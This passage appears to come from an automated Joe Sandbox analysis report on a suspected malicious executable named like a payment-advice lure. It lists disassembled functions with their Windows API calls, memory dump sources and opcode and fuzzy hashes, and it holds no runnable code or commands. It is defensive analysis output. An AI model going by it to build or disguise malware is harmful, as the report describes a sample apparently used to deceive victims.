                          • Instruction Fuzzy Hash: 054147B96042019FC314DF68D8C4D5AF3E5FF8D304B20866EE9568B751DB35E802CB96
                          Function 00450C09 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92COMMON
                          Download Yara Rule
                          APIs
                          • DestroyWindow.USER32(00000000,004A83D8,00000000,?,?), ref: 00450C60
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: DestroyWindow
                          • String ID: msctls_updown32
                          • API String ID: 3375834691-2298589950
                          • Opcode ID: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
                          • Instruction ID: 6a1e1189e42626fde14bc74b9d87f1f450c181bb0fe7a510af516aef360d3f61
                          • Opcode Fuzzy Hash: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
                          • Instruction Fuzzy Hash: CE31A279300201AFD624DF54DC81F5B73A9EB9A714F20451EF640AB382C7B4AC4ACB6A
                          Function 00451191 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0045122A
                          • SendMessageW.USER32(00000000,00000186,00000000,00000000), ref: 00451238
                          • MoveWindow.USER32(?,?,00000000,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 0045125D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: MessageSend$MoveWindow
                          • String ID: Listbox
                          • API String ID: 3315199576-2633736733
                          • Opcode ID: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
                          • Instruction ID: bfe1e9b3800f224edd0053b2d0d87a77da448e7bf5b17050dc61905274d7532a
                          • Opcode Fuzzy Hash: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
                          • Instruction Fuzzy Hash: E421D3712043047BE6209A65DC81F6BB3E8EBCD735F104B1EFA60A72D1C675EC458729
                          Function 0045D235 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                          Download Yara Rule
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 0045D243
                          • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D2C7
                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D30C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: ErrorMode$InformationVolume
                          • String ID: HH
                          • API String ID: 2507767853-2761332787
                          • Opcode ID: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
                          • Instruction ID: 4a708fd112bc3492f79fb502a293ca5b83a6a9b53d4ab80d782c21126568c1ab
                          • Opcode Fuzzy Hash: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
                          • Instruction Fuzzy Hash: 622148756083019FC310EF55D944A6BB7E4FF88704F40882EFA45972A2D774E909CB5A
                          Function 0045D42B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                          Download Yara Rule
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 0045D44A
                          • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CE
                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D502
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: ErrorMode$InformationVolume
                          • String ID: HH
                          • API String ID: 2507767853-2761332787
                          • Opcode ID: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                          • Instruction ID: 8e4373afe1f51974a95c06a3ae407364d3098df30383bdf5f9e51316f0e0b5c8
                          • Opcode Fuzzy Hash: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                          • Instruction Fuzzy Hash: 902137756083019FC314EF55D944A5AB7E8FF88710F40882EFA49972A2D778E909CB9A
                          Function 00450D00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450D74
                          • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450D8A
                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450D98
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID: msctls_trackbar32
                          • API String ID: 3850602802-1010561917
                          • Opcode ID: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
                          • Instruction ID: c83169f0c5ec68c29a3e9aa847b4a28030a04f73c00385235601d1c9d4ce90e2
                          • Opcode Fuzzy Hash: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
                          • Instruction Fuzzy Hash: 4F1193717403117BE610CAA8DC81F5B73E8AB98B25F204A1AFA50A72C1D2B4FC458B68
                          Function 0046BD4D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69networkCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
                          • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046BD78
                          • WSAGetLastError.WSOCK32(00000000,?,?,00000000,?,?), ref: 0046BD83
                          • inet_ntoa.WSOCK32(00000000,?), ref: 0046BDCD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: ByteCharErrorLastMultiWidegethostbynameinet_ntoa
                          • String ID: HH
                          • API String ID: 1515696956-2761332787
                          • Opcode ID: 536d88bcd2219f00ee4950b39be395ae06382d48515621a82e1548501abb3963
                          • Instruction ID: 2fad99cf3c45da3a785a9a513efbde0c8943f1fdc9598a344110207fd9df59bd
                          • Opcode Fuzzy Hash: 536d88bcd2219f00ee4950b39be395ae06382d48515621a82e1548501abb3963
                          • Instruction Fuzzy Hash: E21142765043006BC744FB66D885D9FB3A8AFC4318F448C2EF945A7242DA39E949876A
                          Function 0046CD9A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67comCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
                          • CoInitialize.OLE32(00000000), ref: 0046CE18
                          • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 0046CE31
                          • CoUninitialize.OLE32 ref: 0046CE50
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: CreateInitializeInstanceUninitialize_wcslen
                          • String ID: .lnk
                          • API String ID: 886957087-24824748
                          • Opcode ID: 8095c6d59d69238af541582e7c79e2891b33013a97e816c4c493b562f1f8ea66
                          • Instruction ID: 634f95a1702cd93f148e07eb64efb4b351689d97c5b229aafe37579347e0b37e
                          • Opcode Fuzzy Hash: 8095c6d59d69238af541582e7c79e2891b33013a97e816c4c493b562f1f8ea66
                          • Instruction Fuzzy Hash: E821AF312083009FC700EF55C985F5ABBF4EF89724F148A6EF9549B2E2D7B5A805CB56
                          Function 004497A4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                          • GetMenuItemInfoW.USER32 ref: 004497EA
                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00449817
                          • DrawMenuBar.USER32 ref: 00449828
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Menu$InfoItem$Draw_malloc
                          • String ID: 0
                          • API String ID: 772068139-4108050209
                          • Opcode ID: d608b06cc8126a94f8b189079e1e99a50943cf597b9c9b58a32df480197dd29f
                          • Instruction ID: 895394c4ac3d8cdb9511dba433443d5742fa96e32f07ab63668b9f5a94eb31d1
                          • Opcode Fuzzy Hash: d608b06cc8126a94f8b189079e1e99a50943cf597b9c9b58a32df480197dd29f
                          • Instruction Fuzzy Hash: 941182B16042009BF730EB55EC96FABB7A8FB91714F00452EE648CA281DB7A9445CB76
                          Function 004342A8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33memoryCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: AllocTask_wcslen
                          • String ID: hkG
                          • API String ID: 2651040394-3610518997
                          • Opcode ID: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
                          • Instruction ID: 372044899b15e8c53ead78f1c779643819f92c4817f04f111663958edd7e2adf
                          • Opcode Fuzzy Hash: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
                          • Instruction Fuzzy Hash: DCE065736442225B97506A79AC045CBA7D8AFB0370B15482BF880E7310E278E89643E5
                          Function 0043416A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0043417A
                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0043418C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: GetSystemWow64DirectoryW$kernel32.dll
                          • API String ID: 2574300362-1816364905
                          • Opcode ID: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
                          • Instruction ID: 1a9860a365f0c849ce8c10f1c40c5c80f9dda93506fd3415c38c98a37cde1a5a
                          • Opcode Fuzzy Hash: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
                          • Instruction Fuzzy Hash: F9D05EB1440B039FCB109FA0D80C64BB6E4AB64301F148C2EF885B2654D7B8E8C0CBA8
                          Function 004343CE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(ICMP.DLL,?,00434466,?,?,00464B68,?,?,?,?,?,00000000,?,?,00000101,?), ref: 004343DE
                          • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004343F0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: ICMP.DLL$IcmpSendEcho
                          • API String ID: 2574300362-58917771
                          • Opcode ID: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
                          • Instruction ID: bde82dd314f67bb94adb8237e566b22d9cd50c1f3059090bebd97951f1ce1dc3
                          • Opcode Fuzzy Hash: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
                          • Instruction Fuzzy Hash: C9D017B45043039BD7105B21D80874A76E4AF58310F118C2FF881E2250CBBCE8808B79
                          Function 004343FD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(ICMP.DLL,?,0043447D,?,?,00464B56,?,?,?,?,00000000,?,?,00000101,?,?), ref: 0043440D
                          • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 0043441F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: ICMP.DLL$IcmpCloseHandle
                          • API String ID: 2574300362-3530519716
                          • Opcode ID: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
                          • Instruction ID: 815a2f2ef77883dfca24b23846b24e776c3b140ddfaf16f0983d17b56328066b
                          • Opcode Fuzzy Hash: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
                          • Instruction Fuzzy Hash: 9FD017B04443129AD7106B64D80874A76E4AB68302F129C3FF881A2660C7BCA8808B39
                          Function 0043442C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(ICMP.DLL,?,00434494,?,?,00464A94,?), ref: 0043443C
                          • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 0043444E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: ICMP.DLL$IcmpCreateFile
                          • API String ID: 2574300362-275556492
                          • Opcode ID: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
                          • Instruction ID: c247b13c068300da1972229949477068df6ba5342f41feac8fae2a533bc96115
                          • Opcode Fuzzy Hash: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
                          • Instruction Fuzzy Hash: 97D017B04043029ADB105B60D90875A77E4AB68300F118C7FF9A1A2250C7BCA8808B29
                          Function 0040EE70 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(kernel32.dll,0040E551,?), ref: 0040EE7B
                          • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0040EE8D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: IsWow64Process$kernel32.dll
                          • API String ID: 2574300362-3024904723
                          • Opcode ID: 16a412f97595c511ed2c9e877c1bae7dd0f808d0cf5b3a9fdd28adcf59ee176d
                          • Instruction ID: 75875fa2f3f8b89ed4c8cde0d061cde3839b728dd3838c322d7dfd2ddbff31fa
                          • Opcode Fuzzy Hash: 16a412f97595c511ed2c9e877c1bae7dd0f808d0cf5b3a9fdd28adcf59ee176d
                          • Instruction Fuzzy Hash: 51D0C9B0940707DAC7301F72C91871B7AE4AB40342F204C3EB995A1290DBBCC0408B28
                          Function 0040ACA0 Relevance: 6.4, APIs: 4, Instructions: 368COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: ClearVariant
                          • String ID:
                          • API String ID: 1473721057-0
                          • Opcode ID: 3e9ce65d11b316350caf6cb0db2ee4373dc883206541589756c66e9508b68ec6
                          • Instruction ID: 4e1e522645e86f73b8885f2d86dba7d443b77ce6b8f7ad4508257b27d10f8221
                          • Opcode Fuzzy Hash: 3e9ce65d11b316350caf6cb0db2ee4373dc883206541589756c66e9508b68ec6
                          • Instruction Fuzzy Hash: 3DD18D746003018FD724DF25D484A26B7E1EF49704F64887EE9899B3A1D739EC92CB9A
                          Function 0041456C Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                          Download Yara Rule
                          APIs
                          • __flush.LIBCMT ref: 00414630
                          • __fileno.LIBCMT ref: 00414650
                          • __locking.LIBCMT ref: 00414657
                          • __flsbuf.LIBCMT ref: 00414682
                            • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                            • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                          • String ID:
                          • API String ID: 3240763771-0
                          • Opcode ID: da881668a639e25d03d88a6d97948a76b4f19f87a827f6f9fc91a47de182ffa5
                          • Instruction ID: ec1a4dff6c5341ad57a53ba98b0f539b864df2cc4a0ba96fecd891c5d8a4160d
                          • Opcode Fuzzy Hash: da881668a639e25d03d88a6d97948a76b4f19f87a827f6f9fc91a47de182ffa5
                          • Instruction Fuzzy Hash: 4841A571A00605ABDB249FA5C9445DFB7B6EFC1328F28852FE41997280D77CDEC18B48
                          Function 004781AE Relevance: 6.1, APIs: 4, Instructions: 135COMMON
                          Download Yara Rule
                          APIs
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                          • VariantCopy.OLEAUT32(?,?), ref: 00478259
                          • VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                          • VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: CopyVariant$ErrorLast
                          • String ID:
                          • API String ID: 2286883814-0
                          • Opcode ID: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
                          • Instruction ID: 2d87100fc18953c9afe9b7e879878e48daa4ef19e0256d9a4550ae3fa38499cf
                          • Opcode Fuzzy Hash: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
                          • Instruction Fuzzy Hash: 5F517C751543409FC310DF69C880A9BBBE4FF88314F448A6EF9499B352DB39E909CB99
